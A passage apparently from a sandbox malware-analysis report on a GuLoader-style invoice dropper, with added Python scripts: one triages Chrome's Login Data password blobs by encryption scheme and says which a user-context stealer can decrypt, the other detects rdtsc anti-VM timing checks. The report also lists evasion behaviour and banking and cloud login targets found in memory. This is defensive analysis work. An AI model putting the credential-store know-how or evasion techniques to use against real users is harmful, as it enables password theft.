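    "date_created INTEGER NOT NULL)"
)

# Header of a Windows DPAPI blob: version 1 followed by the CryptProtectData provider GUID.
DPAPI_BLOB_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")


def password_scheme(blob: Optional[bytes]) -> str:
    """Classify a password_value blob by its prefix."""
    if not blob:
        return "empty"
    if blob.startswith(b"v10"):
        return "v10-aesgcm"     # AES-256-GCM; key in Local State, DPAPI-wrapped for the user
    if blob.startswith(b"v20"):
        return "v20-appbound"   # AES-256-GCM; app-bound key, needs SYSTEM and the browser path
    if blob.startswith(DPAPI_BLOB_MAGIC):
        return "dpapi"          # legacy entry: CryptUnprotectData as the user is enough
    return "unknown"


def triage_login_data(conn: sqlite3.Connection) -> List[Dict[str, object]]:
    """One record per stored login, with the number of password_notes attached to it."""
    rows = conn.execute(
        "SELECT l.id, l.origin_url, l.username_value, l.password_value, COUNT(n.id) "
        "FROM logins AS l LEFT JOIN password_notes AS n ON n.parent_id = l.id "
        "GROUP BY l.id ORDER BY l.id"
    ).fetchall()
    return [
        {"url": url, "user": user, "scheme": password_scheme(pw), "notes": notes}
        for _id, url, user, pw, notes in rows
    ]


def open_login_data_copy(path: str) -> sqlite3.Connection:
    """Open a copied Login Data file read-only; immutable=1 sidesteps the -journal/-wal lock."""
    return sqlite3.connect(f"file:{path}?mode=ro&immutable=1", uri=True)


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a real Login Data file (test data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(LOGINS_DDL)
    conn.execute(PASSWORD_NOTES_DDL)
    conn.executemany(
        "INSERT INTO logins (origin_url, username_value, password_value, date_created) "
        "VALUES (?, ?, ?, ?)",
        [
            ("https://mail.example.test/login", "alice", b"v10" + bytes(12) + b"\x11" * 32, 1),
            ("https://legacy.example.test/", "bob", DPAPI_BLOB_MAGIC + b"\x22" * 16, 1),
        ],
    )
    conn.execute(
        "INSERT INTO password_notes (parent_id, key, value, date_created, confidential) "
        "VALUES (1, 'note', ?, 1, 1)",
        (b"v10" + bytes(12) + b"\x33" * 16,),
    )
    return conn


if __name__ == "__main__":
    for rec in triage_login_data(build_sample_db()):
        print(rec)
```

On a real case, copy the file out of %LOCALAPPDATA%\Google\Chrome\User Data\Default\ (or the equivalent for the other Chromium browsers) and pass it to open_login_data_copy; "v10" and "dpapi" rows are the ones a user-context stealer such as this sample can decrypt without further privileges.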

          Data Obfuscation

          Source: Yara match    File source: Process Memory Space: FACTURAS_1_250075.exe PID: 7468, type: MEMORYSTR
          Source: Yara match    File source: 00000000.00000002.1917413249.000000000531D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Code function: 0_2_10002D20 push eax; ret 0_2_10002D4E
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Code function: 12_3_0583EE8C push eax; iretd 12_3_0583EEA9
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Code function: 12_3_0583CF4C push eax; iretd 12_3_0583CF4D
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Code function: 12_3_0583EE64 push eax; iretd 12_3_0583EE65
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Code function: 12_2_380F38E8 pushfd ; iretd 12_2_380F38E9
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    File created: C:\Users\user\AppData\Local\Temp\nsx3725.tmp\System.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Process information set: NOOPENFILEERRORBOX (reported 64 times)

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    API/Special instruction interceptor: Address: 5CDA5F7
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    API/Special instruction interceptor: Address: 21AA5F7
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    RDTSC instruction interceptor: First address: 5C7C2F8 second address: 5C7C2F8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F31E53984B6h 0x00000006 inc ebp 0x00000007 cmp ax, 0000091Ah 0x0000000b inc ebx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    RDTSC instruction interceptor: First address: 214C2F8 second address: 214C2F8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F31E4E636D6h 0x00000006 inc ebp 0x00000007 cmp ax, 0000091Ah 0x0000000b inc ebx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Memory allocated: 57B0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Memory allocated: 36090000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Memory allocated: 35EE0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 600000
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 599891
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 599766
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 599641
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 599531
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 599422
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 599313
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 599188
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 599063
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 598953
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 598844
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 598719
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 598609
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Thread delayed: delay time: 598500
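The two RDTSC interceptor hits above show the timing check behind the "Tries to detect virtualization through RDTSC time measurements" signature: two rdtsc reads bracket a handful of instructions, the elapsed cycle count is compared against a threshold, and a conditional branch takes the evasive path when a debugger, API hook or hypervisor trap has stretched the gap. The script below is an added example, not code from the report or from the sample, of a static triage heuristic for exactly that shape: it finds rdtsc pairs (opcode 0F 31) that sit within a short window and have a conditional short jump between them. The sample bytes are constructed by encoding the mnemonics the report prints; the particular encodings, the jc displacement and the 32-byte window are our choices rather than values from the report, and the matcher works on raw bytes without disassembling, so treat hits as candidates to confirm in a disassembler.

```python
"""Find rdtsc/rdtsc timing checks in a code buffer.  Added example; byte-level
heuristic, not a disassembler."""
from typing import List, Tuple

RDTSC = b"\x0f\x31"            # rdtsc opcode
JCC_SHORT = range(0x70, 0x80)  # jo .. jg rel8; jc/jb is 0x72

# Constructed encoding of the instruction sequence the report prints
# (rdtsc / cmp ebx, ecx / jc / inc ebp / cmp ax, 0x091A / inc ebx / rdtsc).
# Offsets match the report's 0x00..0x0C; the rel8 displacement is a placeholder.
SAMPLE_RDTSC_STUB = bytes([
    0x0F, 0x31,              # 0x00 rdtsc
    0x39, 0xCB,              # 0x02 cmp ebx, ecx
    0x72, 0x10,              # 0x04 jc  +0x10
    0x45,                    # 0x06 inc ebp
    0x66, 0x3D, 0x1A, 0x09,  # 0x07 cmp ax, 0x091A
    0x43,                    # 0x0B inc ebx
    0x0F, 0x31,              # 0x0C rdtsc
])


def find_rdtsc_timing_checks(buf: bytes, window: int = 32) -> List[Tuple[int, int]]:
    """Return (first, second) offsets of rdtsc pairs at most `window` bytes apart
    that have a conditional short jump somewhere between them.  A lone rdtsc
    (e.g. PRNG seeding) is not reported, nor is a pair with nothing branch-like
    in the gap; each rdtsc is used in at most one pair."""
    positions: List[int] = []
    start = 0
    while True:
        i = buf.find(RDTSC, start)
        if i < 0:
            break
        positions.append(i)
        start = i + 1

    hits: List[Tuple[int, int]] = []
    k = 0
    while k < len(positions):
        first = positions[k]
        matched = None
        for second in positions[k + 1:]:
            if second - first > window:
                break
            gap = buf[first + 2:second]
            if any(b in JCC_SHORT for b in gap):
                matched = second
                break
        if matched is None:
            k += 1
            continue
        hits.append((first, matched))
        k = positions.index(matched) + 1   # the second rdtsc is consumed, not reused as a new first
    return hits


def scan_file(path: str, window: int = 32) -> List[Tuple[int, int]]:
    """Scan a dumped memory region or an extracted PE section on disk."""
    with open(path, "rb") as fh:
        return find_rdtsc_timing_checks(fh.read(), window)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for first, second in scan_file(sys.argv[1]):
            print(f"rdtsc pair at 0x{first:x} .. 0x{second:x} ({second - first} bytes apart)")
    else:
        print(find_rdtsc_timing_checks(SAMPLE_RDTSC_STUB))
```

Run it over the unpacked shellcode dump rather than the NSIS installer on disk: the RDTSC stubs live in the decrypted GuLoader code that only exists in memory, which is why the report attributes them to process-memory addresses instead of file offsets.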
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598391Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598281Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598172Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 598060Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597953Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597844Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597719Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597609Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597500Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597391Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597281Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597167Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 597058Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596953Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596844Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596735Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596625Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596516Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596391Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596266Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596156Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 596047Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595931Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595827Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595719Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595601Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595499Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595322Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595184Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 595076Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594958Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594844Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeWindow / User API: threadDelayed 8278Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeWindow / User API: threadDelayed 1562Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx3725.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeAPI coverage: 0.4 %
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep count: 31 > 30Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -28592453314249787s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599891s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7748Thread sleep count: 8278 > 30Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7748Thread sleep count: 1562 > 30Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599641s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599531s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599422s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599313s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599188s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -599063s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598953s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598844s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598719s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598609s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598391s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598281s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598172s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -598060s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597953s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597844s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597719s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597609s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597391s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597281s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597167s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -597058s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596953s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596844s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596735s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596625s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596516s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596391s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596266s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596156s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -596047s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595931s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595827s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595719s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595601s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595499s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595322s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595184s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -595076s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -594958s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -594844s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -594735s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -594610s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -594485s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe TID: 7708Thread sleep time: -594360s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_00405FFD FindFirstFileA,FindClose,0_2_00405FFD
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559B
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_00405FFD FindFirstFileA,FindClose,12_2_00405FFD
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_00402688 FindFirstFileA,12_2_00402688
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,12_2_0040559B
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696501413o
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696501413j
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.00000000360E8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rEqGLI7p5uhNqNCFVrNtQc12HMs0vzinLZc%2FKJbV1jTA%2FzrKnjitar9hXMUGl0dWCYEK0eFc78BMwZRFP1QEMulqXXlhJ%2Fl6vF3iXt5iDycStZ%2BXTjh2r3XVcsKbLpt1HAu7qxFV"}],"group":"cf-nel","max_age":604800}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005BB8000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005C0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696501413t
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003613B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Fc78BMwZRFP1QEMulqXXlhJ%2Fl6vF3iXt5iDycStZ%2BXTjh2r3XVcsKbLpt1HAu7qxFV"}],"group":"cf-nel","max_age":604800}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - HKVMware20,11696501413]
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - HKVMware20,11696501413]
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696501413j
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696501413t
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.comVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696501413s
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696501413f
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.comVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696501413x
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696501413x
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
